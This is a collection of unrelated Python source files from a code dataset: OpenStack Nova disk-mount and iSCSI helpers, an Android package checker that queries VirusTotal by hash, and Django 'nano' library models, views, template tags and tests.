def mnt_dev(self):
try:
partition = int(self.partition or 0)
except ValueError:
self.error = _('unsupported partition: %s') % self.partition
return False
args = ('guestmount', '--rw', '-a', self.image)
if partition == -1:
args += ('-i',) # find the OS partition
elif partition:
args += ('-m', '/dev/sda%d' % partition)
else:
# We don't resort to -i for this case yet,
# as some older versions of libguestfs
# have problems identifying ttylinux images for example
args += ('-m', '/dev/sda')
args += (self.mount_dir,)
# root access should not required for guestfs (if the user
# has permissions to fusermount (by being part of the fuse
# group for example)). Also note the image and mount_dir
# have appropriate creditials at this point for read/write
# mounting by the nova user. However currently there are
# subsequent access issues by both the nova and root users
# if the nova user mounts the image, as detailed here:
# https://bugzilla.redhat.com/show_bug.cgi?id=765814
_out, err = utils.trycmd(*args, discard_warnings=True,
run_as_root=True)
if err:
self.error = _('Failed to mount filesystem: %s') % err
# Be defensive and ensure this is unmounted,
# as I'm not sure guestmount will never have
# mounted when it returns EXIT_FAILURE.
# This is required if discard_warnings=False above
utils.trycmd('fusermount', '-u', self.mount_dir, run_as_root=True)
return False
# More defensiveness as there are edge cases where
# guestmount can return success while not mounting
try:
if not os.listdir(self.mount_dir):
# Assume we've just got the original empty temp dir
err = _('unknown guestmount error')
self.error = _('Failed to mount filesystem: %s') % err
return False
except OSError:
# This is the usual path and means root has
# probably mounted fine
pass
self.mounted = True
return True
def unmnt_dev(self):
if not self.mounted:
return
umount_cmd = ['fusermount', '-u', self.mount_dir]
try:
# We make a few attempts to work around other
# processes temporarily scanning the mount_dir etc.
utils.execute(*umount_cmd, attempts=5, run_as_root=True)
except exception.ProcessExecutionError:
# If we still can't umount, then do a lazy umount
# (in the background), so that mounts might eventually
# be cleaned up. Note we'll wait 10s below for the umount to
# complete, after which we'll raise an exception.
umount_cmd.insert(1, '-z')
utils.execute(*umount_cmd, run_as_root=True)
# Unfortunately FUSE has an issue where it doesn't wait
# for processes associated with the mount to terminate.
# Therefore we do this manually here. Note later versions
# of guestmount have the --pid-file option to help with this.
# Here we check every .2 seconds whether guestmount is finished
# but do this for at most 10 seconds.
wait_cmd = 'until ! ps -C guestmount -o args= | grep -qF "%s"; '
wait_cmd += 'do sleep .2; done'
wait_cmd %= self.mount_dir
utils.execute('timeout', '10s', 'sh', '-c', wait_cmd)
self.mounted = False
```
#### File: nova/volume/iscsi.py
```python
from nova import flags
from nova.openstack.common import cfg
from nova import utils
iscsi_helper_opt = cfg.StrOpt('iscsi_helper',
default='tgtadm',
help='iscsi target user-land tool to use')
FLAGS = flags.FLAGS
FLAGS.register_opt(iscsi_helper_opt)
class TargetAdmin(object):
"""iSCSI target administration.
Base class for iSCSI target admin helpers.
"""
def __init__(self, cmd, execute):
self._cmd = cmd
self.set_execute(execute)
def set_execute(self, execute):
"""Set the function to be used to execute commands."""
self._execute = execute
def _run(self, *args, **kwargs):
self._execute(self._cmd, *args, run_as_root=True, **kwargs)
def new_target(self, name, tid, **kwargs):
"""Create a new iSCSI target."""
raise NotImplementedError()
def delete_target(self, tid, **kwargs):
"""Delete a target."""
raise NotImplementedError()
def show_target(self, tid, **kwargs):
"""Query the given target ID."""
raise NotImplementedError()
def new_logicalunit(self, tid, lun, path, **kwargs):
"""Create a new LUN on a target using the supplied path."""
raise NotImplementedError()
def delete_logicalunit(self, tid, lun, **kwargs):
"""Delete a logical unit from a target."""
raise NotImplementedError()
class TgtAdm(TargetAdmin):
"""iSCSI target administration using tgtadm."""
def __init__(self, execute=utils.execute):
super(TgtAdm, self).__init__('tgtadm', execute)
def new_target(self, name, tid, **kwargs):
self._run('--op', 'new',
'--lld=iscsi', '--mode=target',
'--tid=%s' % tid,
'--targetname=%s' % name,
**kwargs)
self._run('--op', 'bind',
'--lld=iscsi', '--mode=target',
'--initiator-address=ALL',
'--tid=%s' % tid,
**kwargs)
def delete_target(self, tid, **kwargs):
self._run('--op', 'delete',
'--lld=iscsi', '--mode=target',
'--tid=%s' % tid,
**kwargs)
def show_target(self, tid, **kwargs):
self._run('--op', 'show',
'--lld=iscsi', '--mode=target',
'--tid=%s' % tid,
**kwargs)
def new_logicalunit(self, tid, lun, path, **kwargs):
self._run('--op', 'new',
'--lld=iscsi', '--mode=logicalunit',
'--tid=%s' % tid,
'--lun=%d' % (lun + 1), # lun0 is reserved
'--backing-store=%s' % path,
**kwargs)
def delete_logicalunit(self, tid, lun, **kwargs):
self._run('--op', 'delete',
'--lld=iscsi', '--mode=logicalunit',
'--tid=%s' % tid,
'--lun=%d' % (lun + 1),
**kwargs)
class IetAdm(TargetAdmin):
"""iSCSI target administration using ietadm."""
def __init__(self, execute=utils.execute):
super(IetAdm, self).__init__('ietadm', execute)
def new_target(self, name, tid, **kwargs):
self._run('--op', 'new',
'--tid=%s' % tid,
'--params', 'Name=%s' % name,
**kwargs)
def delete_target(self, tid, **kwargs):
self._run('--op', 'delete',
'--tid=%s' % tid,
**kwargs)
def show_target(self, tid, **kwargs):
self._run('--op', 'show',
'--tid=%s' % tid,
**kwargs)
def new_logicalunit(self, tid, lun, path, **kwargs):
self._run('--op', 'new',
'--tid=%s' % tid,
'--lun=%d' % lun,
'--params', 'Path=%s,Type=fileio' % path,
**kwargs)
def delete_logicalunit(self, tid, lun, **kwargs):
self._run('--op', 'delete',
'--tid=%s' % tid,
'--lun=%d' % lun,
**kwargs)
def get_target_admin():
if FLAGS.iscsi_helper == 'tgtadm':
return TgtAdm()
else:
return IetAdm()
``` |
{
"source": "783919/MwAn",
"score": 2
} |
#### File: MwAn/AndroidVTProcess/AndroidVTProcess.py
```python
import subprocess
import os
import sys
import ctypes
import winreg
import time
import json
import re
import logging
import hashlib
import requests
BANNER="Android Virus Total Analyzer rel. 0.0.0 by <NAME> (<EMAIL>). Times are in GMT"
#Optional lookup of NIST good files hash list (GFHL)
#First line of file is header:
#"SHA-1","MD5","CRC32","FileName","FileSize","ProductCode","OpSystemCode","SpecialCode"
USE_NIST_GFHL=True
NIST_GFHL_FNAME="Hash_Android_RDS_v.2.67.txt"
NIST_GFHL_DELIM="[',']{1}"
NIST_GFHL_SHA1_POS=0
NIST_GFHL_FNAME_POS=3
NIST_GFHL_ALLOWED_FILE_EXT=("apk")
#Already checked packages (ACP). We keep track of mobile phone packages already checked just not to repeat
#from start if malware analysis process interrupts
ACP_FNAME="checked_packages.txt"
#final report file name
REPORT_FNAME="report.txt"
SHA1_MATCH="^([a-fA-F0-9]{40})$"
VT_API_KEY_MATCH="^([a-fA-F0-9]{64})$"
VT_API_KEY=""
VT_FILE_REPORT_URL="https://www.virustotal.com/vtapi/v2/file/report"
POSITIVE_RES="positive"
NEGATIVE_RES="negative"
UNKNOWN_RES="unknown"
##############################################################################
def send_data_to_vt(url,params):
tx_ok=False
r = requests.get(url,params)
if r.status_code==200:
# extracting data in json format
tx_ok=True
return tx_ok,r.json()
elif r.status_code==204:
logging.warning("Response delayed by VT server")
#set tuple members according to desired retry policy
delay=(60,120,180)# doubling time delay policy
#another example:
#delay=(5,5,5,5,5,5,5,5,5,5,5,5,5)#fixed delay policy
#another example:
#delay=(1,2,4,8,16,32,64)# exponential delay retry policy
for dly in delay:
logging.warning("Retrying after {0} seconds...".format(dly))
time.sleep(dly)
r = requests.get(url,params)
if r.status_code==200:
tx_ok=True
return tx_ok,r.json()
elif r.status_code==204:
logging.warning("Response delayed by VT server")
continue
else:
logging.error("Fatal error while talking to Virus Total. Code:{0}".format(r.status_code))
break
logging.error("Too many tx retries. Virus Total Server too busy")
else:
logging.error("Fatal error while talking to Virus Total. Code:{0}".format(r.status_code))
data={}
return tx_ok,data
###############################################################################
def parse_vt_response(resp):
ismatch=False
isunknown=False
if resp["response_code"]==0:
isunknown=True
logging.info("Hash not present in VT database")
logging.debug("Response: {0}".format(resp["verbose_msg"]))
elif resp["positives"]==0:
logging.info(
"No VT engine detected hash as a malware. Total: {0}, Positives: {1}, Link: {2}".
format(resp["total"],resp["positives"],resp["permalink"]))
else:
ismatch=True
logging.info("Positive MATCH !!! {0} engines out of {1} detected hash as a malware. Link: {2}".format(
resp["positives"],resp["total"],resp["permalink"]))
return ismatch,isunknown
#############################################################################################
def process_android_packages(sha1_list_file,nist_good_file_hash_list,
already_checked_file_hash_list):
processed_hashes=0
pos_matches=0
negatives=0
unknown=0
line_num=0
try:
f = open(sha1_list_file, "r")
for line in f:
line_num+=1
if line_num==1:
continue#skip header
cols=re.split("\t",line.replace('\n', ''))
sha1=cols[0]
package=cols[1]
processed_hashes+=1
if len(already_checked_file_hash_list)>0:
if sha1 in already_checked_file_hash_list:
logging.info("Package {0} already checked. No need to query Virus Total".format(package))
r = open(REPORT_FNAME,"a")
r.write(sha1+"\t"+already_checked_file_hash_list[sha1]+"\t"+"cache\n")
r.close()
res=re.split("\t",already_checked_file_hash_list[sha1].replace('\n', ''))
if res[1]==POSITIVE_RES:
pos_matches+=1
elif res[1]==NEGATIVE_RES:
negatives+=1
else:
unknown+=1
continue
if USE_NIST_GFHL:
if sha1 in nist_good_file_hash_list:
logging.info("Package {0} is in NIST good files hash list. No need to query Virus Total".format(package))
r = open(REPORT_FNAME,"a")
r.write(sha1+"\t"+nist_good_file_hash_list[sha1]+NEGATIVE_RES+"\t"+"good files list\n")
r.close()
negatives+=1
continue
logging.info("Querying Virus Total for package {0} with SHA1 hash: {1}...".format(package,sha1))
PARAMS = {'apikey':VT_API_KEY,'resource':sha1}
tx_ok,data=send_data_to_vt(VT_FILE_REPORT_URL,PARAMS)
if tx_ok:
ismatch,isunknown=parse_vt_response(data)
result=""
if ismatch:
pos_matches+=1#package detected as malware
result=POSITIVE_RES
elif not isunknown:#update list of already checked good packages
result=NEGATIVE_RES
negatives+=1
else:
result=UNKNOWN_RES
unknown+=1
g=open(ACP_FNAME,"a")
g.write(sha1+"\t"+package+"\t"+result+"\n")
g.close()
r = open(REPORT_FNAME,"a")
r.write(sha1+"\t"+package+"\t"+result+"\t"+"online\n")
r.close()
time.sleep(2)
logging.info("Done. Processed packages: {0} . Positives: {1} Negatives: {2} Unknown: {3}".format(
processed_hashes,pos_matches,negatives,unknown))
f.close()
except Exception as ex:
output=logging.error("An error occurred. {0}".format(ex.args))
############################################################################################
def read_nist_good_hl_file():
line_num=0
gfhl={}
f = open(NIST_GFHL_FNAME, "r")
for line in f:
if line_num==0:#ignore header
line_num+=1
continue
if line.startswith("#"):#ignore comments
line_num+=1
continue
cols=re.split(NIST_GFHL_DELIM,line.replace('"', ''))
gfhl_sha1=cols[NIST_GFHL_SHA1_POS]
gfhl_fname=cols[NIST_GFHL_FNAME_POS]
if re.match(SHA1_MATCH,gfhl_sha1) and gfhl_fname.endswith(NIST_GFHL_ALLOWED_FILE_EXT):
gfhl[gfhl_sha1]=gfhl_fname
f.close()
return gfhl
############################################################################################
def read_already_checked_packages_file():
cgphl={}
if os.path.isfile(ACP_FNAME):
f = open(ACP_FNAME, "r")
for line in f:
cols=re.split("\t",line.replace('\n', ''))
cgphl[cols[0]]=cols[1]+"\t"+cols[2]
f.close()
return cgphl
############################################################################################
#main
try:
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s',
handlers=[
logging.FileHandler('log.txt','a'),#append is default anyway
logging.StreamHandler()
])
logging.Formatter.converter = time.gmtime
logging.info(BANNER)
if len(sys.argv)!=3:
raise Exception("Usage: {0} <path to packages sha1 list file> <Virus Total API key>".
format(sys.argv[0]))
sha1_list_file=sys.argv[1]
if not(os.path.exists(sha1_list_file)):
raise Exception("Path {0} is invalid".format(sha1_list_file))
VT_API_KEY=sys.argv[2]
if not re.match(VT_API_KEY_MATCH,VT_API_KEY):
raise Exception("VT_API_KEY syntax is not valid. Valid Virus Total api keys are 64 hex chars")
if len(NIST_GFHL_ALLOWED_FILE_EXT)==0:
raise Exception("Specify at least one file extension")
r = open(REPORT_FNAME,"w")
r.write("SHA1"+"\t"+"PACKAGE NAME"+"\t"+"RESULT"+"\t"+"SOURCE"+"\n")
r.close()
nist_good_file_hash_list={}
already_checked_files=read_already_checked_packages_file()
if USE_NIST_GFHL:
nist_good_file_hash_list=read_nist_good_hl_file()
process_android_packages(sha1_list_file,nist_good_file_hash_list,already_checked_files)
except Exception as ex:
logging.error("An error occurred. {0}".format(ex.args))
``` |
{
"source": "784134748/kubernetes-install",
"score": 2
} |
#### File: nano/activation/models.py
```python
from __future__ import unicode_literals
from django.utils.encoding import python_2_unicode_compatible
import django.dispatch
from django.conf import settings
from django.db import models
from django.utils.timezone import now as tznow
from nano.activation.signals import key_activated
Q = models.Q
class ActivationError(Exception):
pass
class ActivationKeyError(ActivationError):
pass
def activate(keystring, user):
"""Attempts to activate a specific key for user, returns activated key on activation,
raises an exception otherwise"""
try:
key = Key.objects.get(key=keystring)
except Key.DoesNotExist:
raise ActivationKeyError('Key %s does not exist, typo?' % keystring)
key.activate(user)
return key
class KeyManager(models.Manager):
def expired(self):
now = tznow()
return self.get_queryset().exclude(expires=None).filter(expires__lte=now)
def available(self):
now = tznow()
return self.get_queryset().filter(Q(expires__gt=now)|Q(expires=None)).filter(activated=None)
def activated(self):
now = tznow()
return self.get_queryset().exclude(activated=None)
def activate(self, *args):
return activate(*args)
@python_2_unicode_compatible
class Key(models.Model):
key = models.CharField(max_length=255)
group = models.SlugField(max_length=32, blank=True, null=True)
pub_date = models.DateTimeField(auto_now_add=True)
expires = models.DateTimeField(blank=True, null=True)
activated = models.DateTimeField(blank=True, null=True)
activated_by = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True, related_name='activation_keys')
objects = KeyManager()
class Meta:
db_table = 'nano_activation_code'
ordering = ('-pub_date',)
get_latest_by = 'pub_date'
def __str__(self):
pp_pub_date = self.pub_date
pp_expires = self.expires or ''
return "%s (%s) %s %s" % (self.key, self.group, pp_pub_date, pp_expires)
def activate(self, user):
"""Activates a specific key for user, returns activated key on activation,
raises an exception otherwise"""
now = tznow()
if self.expires and self.expires <= now:
raise ActivationKeyError('Key expired on %s' % self.expires)
if self.activated:
raise ActivationKeyError('Key has already been activated')
self.activated_by = user
self.activated = now
self.save()
key_activated.send_robust(sender=self, user=user, group=self.group)
return self
```
#### File: nano/activation/tests.py
```python
from __future__ import unicode_literals
from unittest import TestCase as LightTestCase
from datetime import timedelta
from django.test import TestCase
from django.contrib.auth.models import User
from django.utils.timezone import now as tznow
from nano.activation.models import activate, Key, ActivationKeyError
from nano.activation import to_base, NUMERALS, generate_keys, baseNgenerator
class KeyTest(TestCase):
def setUp(self):
self.user = User.objects.create(username='test')
def test_str(self):
item = Key.objects.create(key='test')
pub_date = item.pub_date
expected = "test (None) %s %s" % (pub_date, '')
self.assertEqual(str(item), expected)
def test_activate_method(self):
item = Key.objects.create(key='test')
item.activate(self.user)
self.assertIsNotNone(item.activated)
def test_activate_method_already_activated(self):
item = Key.objects.create(key='test')
item.activate(self.user)
with self.assertRaises(ActivationKeyError) as error:
item.activate(self.user)
self.assertEqual(error, 'Key has already been activated')
def test_activate_function(self):
with self.assertRaises(ActivationKeyError) as error:
activate('foo', self.user)
self.assertEqual(error, 'Key foo does not exist, typo?')
item = Key.objects.create(key='bar')
item = activate(item.key, self.user)
self.assertIsNotNone(item.activated)
def test_activate_expired_key(self):
now = tznow()
item = Key(key='test', expires=now)
with self.assertRaises(ActivationKeyError) as error:
item.activate(self.user)
self.assertEqual(error, 'Key expired on %s' % item.expires)
class KeyManagerTest(TestCase):
def setUp(self):
self.user = User.objects.create(username='test')
self.keys = []
for i in range(10):
key = Key.objects.create(key=str(i))
self.keys.append(key)
def test_get_all_keys(self):
result1 = Key.objects.order_by('id')
self.assertEqual(self.keys, list(result1))
result2 = Key.objects.available().order_by('id')
self.assertEqual(self.keys, list(result2))
self.assertEqual(list(result1), list(result2))
def test_get_expired_keys(self):
now = tznow() - timedelta(days=1)
for key in self.keys[5:]:
key.expires = now
key.save()
self.assertEqual(
list(Key.objects.expired().order_by('id')),
self.keys[5:]
)
self.assertEqual(
list(Key.objects.available().order_by('id')),
self.keys[:5]
)
def test_get_activated_keys(self):
now = tznow()
for key in self.keys[5:]:
key.activated = now
key.save()
self.assertEqual(
list(Key.objects.activated().order_by('id')),
self.keys[5:]
)
self.assertEqual(
list(Key.objects.available().order_by('id')),
self.keys[:5]
)
def test_activate_keys(self):
now = tznow() - timedelta(days=1)
for i in range(5):
Key.objects.activate(str(i), self.user)
self.assertEqual(
list(Key.objects.activated().order_by('id')),
self.keys[:5]
)
self.assertEqual(
list(Key.objects.available().order_by('id')),
self.keys[5:]
)
# Expired key
self.keys[-1].expires = now
self.keys[-1].save()
with self.assertRaises(ActivationKeyError) as error:
Key.objects.activate(self.keys[-1].key, self.user)
self.assertEqual(error, 'Key expired on %s' % now)
# Activated key
with self.assertRaises(ActivationKeyError) as error:
Key.objects.activate(self.keys[0].key, self.user)
self.assertEqual(error, 'Key has already been activated')
class FunctionTest(LightTestCase):
def test_to_base(self):
# must succeed
result, expected = to_base(0, 20), '0'
self.assertEqual(result, expected)
result, expected = to_base(7, 1), '1'*7
self.assertEqual(result, expected)
result, expected = to_base(7, 5), '12'
self.assertEqual(result, expected)
result, expected = to_base(-7, 5), '-12'
self.assertEqual(result, expected)
# must fail
with self.assertRaises(ValueError) as error:
maxbase = len(NUMERALS)
result, expected = to_base(7, maxbase+1)
self.assertEqual(error, "<base> must be in the range [1, %i>" % maxbase)
with self.assertRaises(ValueError) as error:
result, expected = to_base('q', 10)
self.assertEqual(error, 'invalid literal for int() with base 10: \'q\'')
with self.assertRaises(ValueError) as error:
result, expected = to_base(1, 'q')
self.assertEqual(error, 'invalid literal for int() with base 10: \'q\'')
def test_generate_keys(self):
amount = 10
result = generate_keys(baseNgenerator(), amount=amount)
self.assertEqual(amount, len(set(result)))
```
#### File: badge/templatetags/badge_tags.py
```python
from __future__ import unicode_literals
from math import ceil
from django import template
from django.core.urlresolvers import reverse
from nano.badge.models import Badge
from nano.tools import grouper
register = template.Library()
# \u25cf BLACK CIRCLE
# \u26ab MEDIUM BLACK CIRCLE (not as common)
SYMBOLS = {
100: '\u25cf',
200: '\u25cf',
300: '\u25cf',
}
SYMBOL_NAMES = {
100: 'bronze',
200: 'silver',
300: 'gold',
}
def sum_badges(user):
levels = {}
for badge in user.badges.all():
levels[badge.level] = levels.setdefault(badge.level, 0) + 1
return levels
def get_badges_for_user(user):
inner_template = '<span class="b%i" title="%s %s badge%s">%s</span>%i'
levels = sum_badges(user)
sorted_levels = reversed(sorted(levels.keys()))
badge_list = []
for level in sorted_levels:
name = SYMBOL_NAMES[level]
symbol = SYMBOLS[level]
num_levels = levels[level]
plural = 's' if num_levels > 1 else ''
badge_list.append(inner_template % (level, num_levels, name, plural, symbol, num_levels))
return badge_list
@register.simple_tag
def show_badges(user):
outer_template = '<span>%s</span>'
badge_list = get_badges_for_user(user)
if badge_list:
return outer_template % '\xa0'.join(badge_list)
return ''
@register.simple_tag
def show_badges_as_table(user, cols=4):
outer_template = '<table>%s</table>'
cell = '<td>%s</td>'
row = '<tr>%s</tr>\n'
single_col = '<tr><td>%s</td></tr>\n'
badge_list = get_badges_for_user(user)
if cols == 1:
return [single_col % badge for badge in badge_list]
elif cols > 1:
piecesize = int(ceil(len(badge_list) / float(cols)))
badge_lists = grouper(piecesize, badge_list)
outer = []
go_over = list(range(cols))
for p in range(piecesize):
inner = []
for i in go_over:
inner.append(cell % badge_list[i][p])
outer.append(row % ''.join(inner))
return outer_template % ''.join(outer)
@register.simple_tag
def show_badge(badge):
if not badge: return ''
template = '<span class="badge"><a href="%(link)s"><span class="b%(level)i" >%(symbol)s</span> %(name)s</a></span>'
fillin = {
'level': badge.level,
'symbol': SYMBOLS[badge.level],
'name': badge.name,
'link': reverse('badge-detail', args=[badge.id]),
}
return template % fillin
@register.simple_tag
def show_badge_and_freq(badge):
template = '<span class="badge-freq">%s (%i)</span>'
badge_text = show_badge(badge)
return template % (badge_text, badge.receivers.count())
```
#### File: nano/badge/tests.py
```python
from __future__ import unicode_literals
from django.test import TestCase
from django.contrib.auth.models import User
from nano.badge.models import Badge
from nano.badge import add_badge, batchbadge
from nano.badge.views import ListBadgeView
class BadgeTest(TestCase):
def test_str(self):
item = Badge(name='test', description='Test')
self.assertEqual(str(item), item.name)
class BadgeManagerTest(TestCase):
def setUp(self):
self.badge = Badge.objects.create(name='test', description='Test')
self.users = []
for i in range(10):
self.users.append(User.objects.create(username='user%i' % i))
for user in self.users[:5]:
self.badge.receivers.add(user)
def test_get_all_recipients(self):
result = list(Badge.objects.get_all_recipients())
self.assertEqual(result, self.users[:5])
def test_get_all_nonrecipients(self):
result = list(Badge.objects.get_all_nonrecipients())
self.assertEqual(result, self.users[5:])
class BadgeFunctionsTest(TestCase):
def setUp(self):
self.badge = Badge.objects.create(name='test', description='Test')
self.users = []
for i in range(10):
self.users.append(User.objects.create(username='user%i' % i))
for user in self.users[:2]:
self.badge.receivers.add(user)
def test_add_badge(self):
add_badge(self.badge, self.users[2])
self.assertEqual(list(self.users[2].badges.all()), [self.badge])
add_badge(self.badge, self.users[0])
self.assertEqual(list(self.users[0].badges.all()), [self.badge])
def test_batchbadge(self):
self.assertEqual(list(self.badge.receivers.all()), self.users[:2])
batchbadge(self.badge, User.objects.all())
self.assertEqual(list(self.badge.receivers.all()), self.users)
class BadgeMixinTest(TestCase):
def test_get_context_data(self):
bm = ListBadgeView()
bm.object_list = None # set during as_view in 1.6
context = bm.get_context_data(object_list=None) # argument in 1.5
self.assertEqual(context['me'], 'badge')
```
#### File: nano/blog/tools.py
```python
from datetime import timedelta
from django.utils.timezone import now as tznow
from django.template.loader import render_to_string
from nano.blog.models import Entry as _Entry
from nano.blog.settings import NANO_BLOG_TAGS, NANO_BLOG_SPECIAL_TAGS
_five_minutes = timedelta(seconds=5*60)
def add_entry_to_blog(obj, headline, template, date_field='last_modified'):
"""Auto-blog about <obj>
obj: object to blog about
headline: string w/o html
template: template, given the context 'obj' mapping to the object
date_field: date_field on object to be used for publishing date
"""
data = {'obj': obj}
current_time = tznow()
template = render_to_string(template, dictionary=data)
pub_date = obj.__dict__.get(date_field, current_time)
latest = _Entry.objects.latest()
# Prevent duplicates
if not (latest.headline == headline and latest.pub_date > current_time - _five_minutes):
blog_entry = _Entry.objects.create(content=template,headline=headline,pub_date=pub_date)
return blog_entry
def get_nano_blog_entries(special_tags=NANO_BLOG_SPECIAL_TAGS, cutoff=2):
"""Fetch <cutoff> number of most recent blog entries and split out
entries tagged with <special_tags>.
cutoff: integer, default 2
special_tags: iterable collection of strings, default NANO_BLOG_SPECIAL_TAGS
"""
special_news = ()
news = _Entry.objects
if NANO_BLOG_TAGS:
special_news = news.filter(tags__slug__in=special_tags)
special_news = special_news.order_by('-pub_date')[:cutoff]
if special_news:
news = news.exclude(id__in=[e.id for e in special_news])
else:
news = news.all()
news = news.order_by('-pub_date')[:cutoff]
return news, special_news
```
#### File: nano/blog/views.py
```python
import datetime
from django.views.generic import ListView
from django.views.generic import (ArchiveIndexView,
YearArchiveView,
MonthArchiveView,
DayArchiveView,
TodayArchiveView,
)
from nano.blog.models import Entry
class BlogMixin(object):
queryset = Entry.objects.all().order_by('-pub_date')
def get_context_data(self, **kwargs):
context = super(BlogMixin, self).get_context_data(**kwargs)
context['me'] = 'news'
context['now_today'] = datetime.date.today()
context['latest'] = self.get_queryset()[:30]
return context
class BlogDateMixin(BlogMixin):
date_field = 'pub_date'
class MonthBlogMixin(BlogDateMixin):
allow_empty = True
month_format = '%m'
class ListBlogView(BlogMixin, ListView):
pass
list_entries = ListBlogView.as_view()
class YearBlogView(BlogDateMixin, YearArchiveView):
allow_empty = True
make_object_list = True
list_entries_by_year = YearBlogView.as_view()
class MonthBlogView(MonthBlogMixin, MonthArchiveView):
pass
list_entries_by_year_and_month = MonthBlogView.as_view()
class DayBlogView(MonthBlogMixin, MonthArchiveView):
pass
list_entries_by_date = DayBlogView.as_view()
class TodayBlogView(MonthBlogMixin, MonthArchiveView):
pass
list_entries_for_today = TodayBlogView.as_view()
class LatestBlogView(BlogDateMixin, ArchiveIndexView):
pass
list_latest_entries = LatestBlogView.as_view()
```
#### File: nano/chunk/loaders.py
```python
from django.apps import apps
from django.conf import settings
from django.template import TemplateDoesNotExist
from django.utils._os import safe_join
from django.template.loaders.base import Loader
class ChunkLoader(Loader):
is_usable = True
def load_template_source(self, template_name, template_dirs=None):
chunk_model = apps.get_model('chunk', 'Chunk')
try:
chunk = chunk_model.objects.get(slug=template_name)
return (chunk.content, template_name)
except chunk_model.DoesNotExist:
error_msg = "Couldn't find a chunk named %s" % template_name
raise TemplateDoesNotExist(error_msg)
```
#### File: nano/chunk/models.py
```python
from __future__ import unicode_literals
from django.utils.encoding import python_2_unicode_compatible
from django.db import models
@python_2_unicode_compatible
class Chunk(models.Model):
slug = models.SlugField()
content = models.TextField()
class Meta:
db_table = 'nano_chunk_chunk'
def __str__(self):
return self.slug
```
#### File: nano/chunk/tests.py
```python
from __future__ import unicode_literals
from django.test import TestCase
from django.template.engine import Engine
from django.template import TemplateDoesNotExist
from nano.chunk.models import Chunk
class ChunkTest(TestCase):
def setUp(self):
engine = Engine(loaders=['nano.chunk.loaders.ChunkLoader'])
self.loader = engine.template_loaders[0]
def test_str(self):
item = Chunk(slug='test', content='Test')
self.assertEqual(str(item), item.slug)
def test_non_existing(self):
with self.assertRaises(TemplateDoesNotExist):
self.loader.load_template_source("not-existing.html")
def test_existing(self):
content = 'Test!'
template_name = 'test'
chunk = Chunk.objects.create(slug=template_name, content=content)
result = self.loader.load_template_source("test")
self.assertEqual(result[0], content)
self.assertEqual(result[1], template_name)
```
#### File: nano/faq/models.py
```python
from __future__ import unicode_literals
from django.utils.encoding import python_2_unicode_compatible
from django.utils.timezone import now as tznow
from django.db import models
@python_2_unicode_compatible
class QA(models.Model):
question = models.CharField(max_length=255)
answer = models.TextField()
last_modified = models.DateTimeField(default=tznow, editable=False)
class Meta:
db_table = 'nano_faq_qa'
def __str__(self):
return self.question
def save(self, *args, **kwargs):
self.last_modified = tznow()
super(QA, self).save(*args, **kwargs)
```
#### File: nano/mark/models.py
```python
from __future__ import unicode_literals
from django.utils import six
from django.utils.encoding import python_2_unicode_compatible
from django.utils.timezone import now as tznow
from django.template.defaultfilters import slugify
from django.contrib.contenttypes.models import ContentType
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext_lazy as _
#from django.conf import settings
from nano.tools.models import GenericForeignKeyAbstractModel
from nano.mark.managers import MarksManager
class MarkedMixin(models.Model):
"Used by marked models"
class Meta:
abstract = True
def marks(self):
ct = ContentType.objects.get_for_model(self)
return Mark.objects.filter(content_type = ct, object_pk = six.text_type(self.pk))
def flagged(self):
return self.marks.filter(marktype__slug='flag')
def faved(self):
return self.marks.filter(marktype__slug='fave')
def scrambled(self):
return self.marks.filter(marktype__slug='scrambled')
def removed(self):
return self.marks.filter(marktype__slug='removed')
@property
def hidden(self):
marks = self.marks.filter(marktype__slug='flag')
return True if marks.filter(marktype__hide=True) else False
@python_2_unicode_compatible
class MarkType(models.Model):
name = models.CharField(max_length=32)
slug = models.SlugField(unique=True)
hide = models.BooleanField(default=False)
verify = models.BooleanField(default=False)
permanent = models.BooleanField(default=False)
class Meta:
db_table='nano_mark_marktype'
def __str__(self):
return self.name
def save(self, *args, **kwargs):
self.slug = slugify(self.name)
super(MarkType, self).save(*args, **kwargs)
@python_2_unicode_compatible
class Mark(GenericForeignKeyAbstractModel):
marked_by = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_('user'), related_name="marks")
marked_at = models.DateTimeField(_('date/time marked'), default=tznow)
marktype = models.ForeignKey(MarkType)
comment = models.CharField(max_length=256, blank=True, null=True)
objects = MarksManager()
class Meta:
db_table='nano_mark_mark'
class Meta:
db_table = "nano_mark"
ordering = ('marked_at',)
get_latest_by = 'marked_at'
def __str__(self):
return "%s have marked %s" % (self.marked_by, self.content_object)
def save(self, parent=None, *args, **kwargs):
if self.marked_at is None:
self.marked_at = tznow()
super(Mark, self).save(*args, **kwargs)
```
#### File: mark/templatetags/nano_mark_tags.py
```python
from django.template import Library, Context
from django.template.loader import get_template
from django.contrib.contenttypes.models import ContentType
from nano.mark.models import MarkType, Mark
register = Library()
@register.inclusion_tag('nano/mark/mark.html', takes_context=True)
def mark(context, model, type="flag"):
ok_type = MarkType.objects.filter(slug=type)
model_pk = model.pk
ct = ContentType.objects.get_for_model(model)
model_type = ct.id
status = Mark.objects.filter(object_pk=str(model_pk), content_type=ct).count()
request = context['request']
user = request.user
next = request.path
return {
'model_pk': model_pk,
'model_type': model_type,
'type': type if ok_type else "flag",
'unique_id': '%s_%s' % (type, model_pk),
'user': user,
'next': next,
'status': status,
}
@register.inclusion_tag('nano/mark/mark_faved.html', takes_context=True)
def mark_faved(context, model):
return mark(context, model, 'fave')
```
#### File: nano/tools/middleware.py
```python
from django.views.debug import technical_500_response
import sys
# Django snippet
# Author: zbyte64
# Posted: July 31, 2008
class UserBasedExceptionMiddleware(object):
def process_exception(self, request, exception):
if request.user.is_superuser:
return technical_500_response(request, *sys.exc_info())
```
#### File: nano/tools/models.py
```python
from __future__ import unicode_literals
from django.utils import six
from django.conf import settings
from django.core import urlresolvers
from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.contrib.contenttypes import fields as generic
class UnorderedTreeManager(models.Manager):
def roots(self):
"Return a list of tree roots, nodes having no parents"
return self.get_queryset().filter(part_of__isnull=True)
class UnorderedTreeMixin(models.Model):
part_of = models.ForeignKey('self', blank=True, null=True, default=None, related_name='has_%(class)s_children')
path = models.CharField(max_length=255, blank=True, default='')
tree = UnorderedTreeManager()
_sep = '/'
class Meta:
abstract = True
def save(self, *args, **kwargs):
if not self.id:
super(UnorderedTreeMixin, self).save(*args, **kwargs)
self._set_path()
